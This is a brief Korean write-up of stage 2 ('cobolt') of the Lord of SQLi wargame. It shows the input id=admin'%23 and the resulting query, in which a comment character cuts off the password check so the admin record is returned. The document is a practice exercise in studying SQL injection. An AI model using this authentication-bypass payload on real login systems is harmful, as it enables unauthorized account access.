<LOS> - 2번(cobolt)

2단계는 id가 admin인 레코드를 반환 받아야 하는 문제이다.

주소에 id=admin'%23을 입력한다면

query = SELECT id FROM porb_cobolt where id='admin'#' and pw=md5('')

(초록색 글씨는 주석처리) 가 되어, id가 admin인 레코드를 반환 받을 수 있다.

클리어